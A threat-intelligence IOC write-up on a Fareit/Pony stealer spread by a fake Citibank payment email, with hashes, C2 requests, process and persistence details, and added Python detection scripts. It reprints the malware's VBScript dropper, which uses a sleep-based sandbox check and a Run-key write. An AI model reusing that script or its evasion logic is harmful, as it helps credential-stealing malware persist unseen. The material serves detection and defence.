#Fareit_181018

VRad, Oct 19th, 2018

#IOC #OptiData #VR #Pony #Fareit #ACE

https://pastebin.com/u0D14L5r
FAQ:
https://radetskiy.wordpress.com/?s=fareit

attack_vector
--------------
email attach (.ace) > exe > %temp%\subfolder\filename.exe (+ filename.vbs, see drop; %temp% is C:\tmp on the analysis host below)

email_headers
--------------
Received: from plesk2.qsoftweb.com (plesk2.qsoftweb.com [78.46.145.250])
    by mailsrv2.victim1.com (8.15.2/8.15.2) with SMTP id w9I9rvLr042922
    for <user01@org3.victim1.com>; Thu, 18 Oct 2018 12:54:08 +0300 (EEST)
    (envelope-from spoof@citicorp.com)
Received: from webmail.edwise.pk (localhost [IPv6:::1])
    by plesk2.qsoftweb.com (Postfix) with ESMTPSA id 7CE3E20B62;
    Thu, 18 Oct 2018 05:44:02 -0400 (EDT)
Date: Thu, 18 Oct 2018 10:44:02 +0100
From: CITIBANK <spoof@citicorp.com>
To: undisclosed-recipients:;
Subject: Payment Slip - Payment remitted 15/10/2018
X-Sender: spoof@citicorp.com
User-Agent: Roundcube Webmail/1.3.6

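Added example (not part of the original paste, not OptiData code): a Python triage of the Received chain above. It reads the header block exactly as shown, unfolds the continuation lines, pulls each hop's HELO name, reverse-DNS name, IP, receiving host and protocol, and reports what an analyst otherwise checks by hand: the From domain (citicorp.com) appears nowhere in the relay chain, the origin hop is an authenticated submission (ESMTPSA) from localhost on plesk2.qsoftweb.com, i.e. the mail was sent through a mailbox on that server rather than relayed from citicorp.com, and the recipient list is hidden. The own_domain argument (victim1.com) and the wording of the findings are this example's assumptions. Only the hop stamped by your own MTA can be trusted; the lower Received lines were written by foreign servers and can be forged, so the IP worth blocking or looking up is the one your MX saw (78.46.145.250).

```python
"""Triage of the phishing mail's Received chain (added example, not from the paste)."""
import email
import email.utils
import re

# Header block copied from the paste; a header-only message is enough for triage.
RAW_HEADERS = """\
Received: from plesk2.qsoftweb.com (plesk2.qsoftweb.com [78.46.145.250])
    by mailsrv2.victim1.com (8.15.2/8.15.2) with SMTP id w9I9rvLr042922
    for <user01@org3.victim1.com>; Thu, 18 Oct 2018 12:54:08 +0300 (EEST)
    (envelope-from spoof@citicorp.com)
Received: from webmail.edwise.pk (localhost [IPv6:::1])
    by plesk2.qsoftweb.com (Postfix) with ESMTPSA id 7CE3E20B62;
    Thu, 18 Oct 2018 05:44:02 -0400 (EDT)
Date: Thu, 18 Oct 2018 10:44:02 +0100
From: CITIBANK <spoof@citicorp.com>
To: undisclosed-recipients:;
Subject: Payment Slip - Payment remitted 15/10/2018
X-Sender: spoof@citicorp.com
User-Agent: Roundcube Webmail/1.3.6

"""

# "from <helo> (<rdns> [<ip>])" as Postfix/Sendmail write it; IPv6 literals carry an "IPv6:" tag.
HOP_RE = re.compile(r'from\s+(?P<helo>\S+)\s+\((?P<rdns>[^\s\[\]]*)\s*(?:\[(?:IPv6:)?(?P<ip>[^\]]+)\])?\)')
BY_RE = re.compile(r'\bby\s+(?P<by>\S+)')
WITH_RE = re.compile(r'\bwith\s+(?P<proto>\S+)')
ENVFROM_RE = re.compile(r'envelope-from\s+<?(?P<addr>[^\s>)]+)')
AUTH_SUBMISSION = {'ESMTPA', 'ESMTPSA'}   # trailing "A": the client authenticated to the MTA


def _first(regex, text, group):
    m = regex.search(text)
    return m.group(group) if m else None


def parse_hops(msg):
    """Return the Received hops top-down (top = stamped by our MX, bottom = origin)."""
    hops = []
    for raw in msg.get_all('Received', []):
        value = ' '.join(raw.split())          # unfold the continuation lines
        hops.append({
            'helo': _first(HOP_RE, value, 'helo'),
            'rdns': _first(HOP_RE, value, 'rdns'),
            'ip': _first(HOP_RE, value, 'ip'),
            'by': _first(BY_RE, value, 'by'),
            'proto': _first(WITH_RE, value, 'proto'),
            'envelope_from': _first(ENVFROM_RE, value, 'addr'),
        })
    return hops


def triage(raw_headers, own_domain):
    msg = email.message_from_string(raw_headers)
    hops = parse_hops(msg)
    findings = []

    from_addr = email.utils.parseaddr(msg.get('From', ''))[1]
    from_domain = from_addr.rpartition('@')[2].lower()

    # Only the hop written by our own MTA is trustworthy; the IP it saw is the one to act on.
    ours = [h for h in hops if h['by'] and h['by'].lower().endswith(own_domain.lower())]
    handoff_ip = ours[0]['ip'] if ours else None

    chain_names = [n for h in hops for n in (h['helo'], h['rdns'], h['by']) if n]
    if from_domain and not any(n.lower().endswith(from_domain) for n in chain_names):
        findings.append(f'From domain {from_domain} appears nowhere in the Received chain '
                        f'(handed to us by {handoff_ip})')

    origin = hops[-1] if hops else None
    if origin and origin['proto'] and origin['proto'].upper() in AUTH_SUBMISSION:
        findings.append(f'origin hop is an authenticated submission ({origin["proto"]}) from '
                        f'{origin["rdns"]} on {origin["by"]}: sent through a mailbox on that server')

    if 'undisclosed-recipients' in msg.get('To', '').lower():
        findings.append('recipient list hidden (undisclosed-recipients)')

    return {
        'hops': hops,
        'from_domain': from_domain,
        'envelope_from': next((h['envelope_from'] for h in hops if h['envelope_from']), None),
        'handoff_ip': handoff_ip,
        'findings': findings,
    }


if __name__ == '__main__':
    result = triage(RAW_HEADERS, 'victim1.com')
    for hop in result['hops']:
        print(hop)
    for finding in result['findings']:
        print('!!', finding)
```

The Date header (10:44:02 +0100) and the origin hop's timestamp (05:44:02 -0400) both resolve to 09:44:02 UTC, so the timing is internally consistent here; the tell is the relay path and the authenticated submission, not the clock.
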
email_subjects
--------------
Payment Slip - Payment remitted 15/10/2018

files
--------------
SHA-256     ad73105314b633bff23b5f9065d1f2ed3248ea6ad1a69c2893021c9618ce6fa3
File name   Payment slip.ace
File size   264.85 KB

SHA-256     3c616a7c56f6e2bdf4d878e2ada4662f7b70215aa474135c5d463af0e78c6783
File name   Kakih       > %temp%\subfolder\filename.exe
File size   618.27 KB

activity
**************

netwrk
--------------
194.36.173.171  armansaykham.com    POST /nonso/gate.php HTTP/1.0                                                   Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
67.227.226.240  pornhouse.mobi      GET /main.php?dir=//Virgin%20Babes%20First%20Sex&start=1&sort=1 HTTP/1.0        Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

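Added example (not part of the original paste, not OptiData code): detection logic for the two requests above, run over a constructed proxy-log extract. The user-agent "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" is hard-coded in the Pony/Fareit binary, and together with the HTTP/1.0 POST to */gate.php it is the beacon signature; the second request, to pornhouse.mobi, carries the same user-agent and is caught by the user-agent rule alone. The log format (tab-separated fields), the client IPs, the benign filler lines, the weights and the threshold are all constructed for the example. Hunting on the user-agent rather than on armansaykham.com is the point: the C2 domain rotates between campaigns, the string in the binary does not.

```python
"""Flag Pony/Fareit C2 beacons in an HTTP proxy log (added example, not from the paste)."""
import re

# Constructed log extract, tab-separated: time, client, method, host, path, version, user-agent.
# The first two records reproduce the two requests from the paste; the rest are benign filler.
SAMPLE_LOG = """\
2018-10-18T14:32:01Z\t10.0.0.15\tPOST\tarmansaykham.com\t/nonso/gate.php\tHTTP/1.0\tMozilla/4.0 (compatible; MSIE 5.0; Windows 98)
2018-10-18T14:32:03Z\t10.0.0.15\tGET\tpornhouse.mobi\t/main.php?dir=//Virgin%20Babes%20First%20Sex&start=1&sort=1\tHTTP/1.0\tMozilla/4.0 (compatible; MSIE 5.0; Windows 98)
2018-10-18T14:32:05Z\t10.0.0.22\tGET\twww.example.com\t/\tHTTP/1.1\tMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/69.0.3497.100 Safari/537.36
2018-10-18T14:32:09Z\t10.0.0.22\tPOST\tintranet.victim1.com\t/login.php\tHTTP/1.1\tMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/69.0.3497.100 Safari/537.36
2018-10-18T14:32:12Z\t10.0.0.31\tGET\tupdate.example.org\t/gate.php\tHTTP/1.1\tcurl/7.61.0
"""

PONY_UA = 'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)'   # hard-coded in the Pony binary
GATE_RE = re.compile(r'/gate\.php(?:\?|$)', re.I)
THRESHOLD = 3                                                 # one strong indicator is enough
FIELDS = ('time', 'client', 'method', 'host', 'path', 'version', 'ua')


def parse(line):
    """Split one tab-separated record into a dict; None for malformed lines."""
    parts = line.rstrip('\n').split('\t')
    if len(parts) != len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))


def score(rec):
    """Weighted indicators: the UA or the gate POST alone reach the threshold, HTTP/1.0 alone does not."""
    reasons = []
    if rec['ua'] == PONY_UA:
        reasons.append((3, 'Pony user-agent (MSIE 5.0 / Windows 98)'))
    if rec['method'] == 'POST' and GATE_RE.search(rec['path']):
        reasons.append((3, 'POST to */gate.php (Pony gate)'))
    if rec['version'] == 'HTTP/1.0':
        reasons.append((1, 'HTTP/1.0 from a desktop client'))
    return sum(w for w, _ in reasons), [r for _, r in reasons]


def detect(log_text, threshold=THRESHOLD):
    """Return the records at or above the threshold, with line number, client, host and reasons."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        rec = parse(line)
        if rec is None:
            continue
        total, reasons = score(rec)
        if total >= threshold:
            hits.append({'line': lineno, 'client': rec['client'], 'host': rec['host'],
                         'score': total, 'reasons': reasons})
    return hits


if __name__ == '__main__':
    for hit in detect(SAMPLE_LOG):
        print(hit)
```

The GET /gate.php from curl on line 5 scores zero on purpose: the gate rule requires a POST, which is what the Pony client sends, so a generic download path of the same name does not page anyone.
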
comp
--------------
[System Process]    0       TCP 194.36.173.171  80  TIME_WAIT
filename.exe        2160    TCP 67.227.226.240  80  ESTABLISHED

proc
--------------
"C:\Users\operator\Desktop\Payment slip.exe"
"C:\Windows\System32\WScript.exe" "C:\tmp\subfolder\filename.vbs"
"C:\tmp\subfolder\filename.exe"
"C:\tmp\subfolder\filename.exe"
C:\Windows\SysWOW64\cmd.exe  /c ""C:\tmp\7710921.bat"       "C:\tmp\subfolder\filename.exe"   "

vbs
--------------
On Error Resume Next
Set WshShell = CreateObject("WScript.Shell")
myKey = "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Registry Key Name"
Vbs = "C:\tmp\subfolder\filename.vbs"
If WScript.Arguments.Count = 0 Then
    ' First run (no arguments): sleep 5 s and check that the clock really advanced
    ' before writing the Run key. A sandbox that skips or shortens Sleep fails the
    ' check and never sees the persistence. (=> is VBScript's spelling of >=.)
    GG = second(now)
    WScript.Sleep 5000
    VV = second(now)
    Vbs = Vbs & " -FF"
    If Abs(VV-GG) => 5 then WshShell.RegWrite myKey,Vbs,"REG_SZ"
    WScript.Quit
end if
' Later runs (started with an argument, e.g. the -FF appended to the Run value): launch the payload
WshShell.Run """C:\tmp\subfolder\filename.exe"""

persist
--------------
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run              18.10.2018 17:32
Registry Key Name           c:\tmp\subfolder\filename.vbs       18.10.2018 17:32

drop
--------------
C:\tmp\subfolder\filename.exe
C:\tmp\subfolder\filename.vbs

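Added example (not part of the original paste, not OptiData code): hunting logic for the proc, persist and drop sections above, run over constructed endpoint telemetry. The process events reproduce the command lines from the proc section plus two benign ones; the Run values reproduce the persist entry plus one benign one. No parent/child relationships are asserted because the paste does not record them. The temp-directory pattern treats C:\tmp (which is %temp% on the analysis host) the same as the usual %temp%, \AppData\Local\Temp and C:\Windows\Temp locations; the rules and the benign filler are this example's assumptions.

```python
"""Hunt for the execution and persistence chain in endpoint telemetry (added example, not from the paste)."""
import re

# %temp% on the analysis host is C:\tmp; the usual temp locations of a normal box are listed too.
TEMP_RE = re.compile(r'(%temp%|C:\\tmp\\|\\AppData\\Local\\Temp\\|C:\\Windows\\Temp\\)', re.I)
SCRIPT_EXT_RE = re.compile(r'\.(vbs|vbe|js|jse|wsf|bat|cmd|ps1)\b', re.I)
SCRIPT_HOSTS = {'wscript.exe', 'cscript.exe'}

# Constructed Sysmon-style process-creation events. The first four reproduce the proc section
# of the paste; the last two are benign filler.
EVENTS = [
    {'Image': r'C:\Users\operator\Desktop\Payment slip.exe',
     'CommandLine': r'"C:\Users\operator\Desktop\Payment slip.exe"'},
    {'Image': r'C:\Windows\System32\WScript.exe',
     'CommandLine': r'"C:\Windows\System32\WScript.exe" "C:\tmp\subfolder\filename.vbs"'},
    {'Image': r'C:\tmp\subfolder\filename.exe',
     'CommandLine': r'"C:\tmp\subfolder\filename.exe"'},
    {'Image': r'C:\Windows\SysWOW64\cmd.exe',
     'CommandLine': r'C:\Windows\SysWOW64\cmd.exe  /c ""C:\tmp\7710921.bat"       "C:\tmp\subfolder\filename.exe"   "'},
    {'Image': r'C:\Windows\System32\WScript.exe',
     'CommandLine': r'"C:\Windows\System32\WScript.exe" "C:\Program Files\Vendor\logon.vbs"'},
    {'Image': r'C:\Windows\System32\cmd.exe',
     'CommandLine': r'cmd.exe /c "C:\Scripts\backup.bat"'},
]

# Constructed HKCU\...\Run values; the first is the entry from the persist section.
RUN_ENTRIES = [
    ('Registry Key Name', r'c:\tmp\subfolder\filename.vbs'),
    ('OneDrive', r'"C:\Users\operator\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
]


def basename(path):
    return path.strip('"').rsplit('\\', 1)[-1].lower()


def check_process(ev):
    """Rules over one process-creation event; returns the list of matched reasons."""
    reasons = []
    image = basename(ev['Image'])
    cmd = ev['CommandLine']
    if image in SCRIPT_HOSTS and SCRIPT_EXT_RE.search(cmd) and TEMP_RE.search(cmd):
        reasons.append('script host running a script from a temp directory')
    if (image == 'cmd.exe' and re.search(r'/c\b', cmd, re.I)
            and re.search(r'\.bat\b', cmd, re.I) and TEMP_RE.search(cmd)):
        reasons.append('cmd.exe /c running a .bat from a temp directory')
    if TEMP_RE.search(ev['Image']):
        reasons.append('process image located in a temp directory')
    return reasons


def check_run_value(name, value):
    """Rules over one HKCU Run value; a script in temp (as here) trips both."""
    reasons = []
    if TEMP_RE.search(value):
        reasons.append('Run value points into a temp directory')
    if SCRIPT_EXT_RE.search(value):
        reasons.append('Run value launches a script rather than a program')
    return reasons


def hunt(events, run_entries):
    """One alert per matched rule, tagged with its source so the two feeds can be correlated."""
    alerts = []
    for ev in events:
        for reason in check_process(ev):
            alerts.append({'source': 'process', 'subject': ev['CommandLine'], 'reason': reason})
    for name, value in run_entries:
        for reason in check_run_value(name, value):
            alerts.append({'source': 'run', 'subject': f'{name} = {value}', 'reason': reason})
    return alerts


if __name__ == '__main__':
    for alert in hunt(EVENTS, RUN_ENTRIES):
        print(alert)
```

The initial "Payment slip.exe" on the Desktop is deliberately not flagged by these rules: a user-launched attachment is the ACE-archive delivery, and catching it belongs to the mail gateway, not to the temp-directory and script-host rules that pick up the three stages it spawns.
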
# # #
https://www.virustotal.com/#/file/ad73105314b633bff23b5f9065d1f2ed3248ea6ad1a69c2893021c9618ce6fa3/details
https://www.virustotal.com/#/file/3c616a7c56f6e2bdf4d878e2ada4662f7b70215aa474135c5d463af0e78c6783/details
https://analyze.intezer.com/#/analyses/52017eed-c2d4-4da9-be09-a1a57f09cfa5

Harvests credentials from local FTP client software
Harvests information related to installed mail clients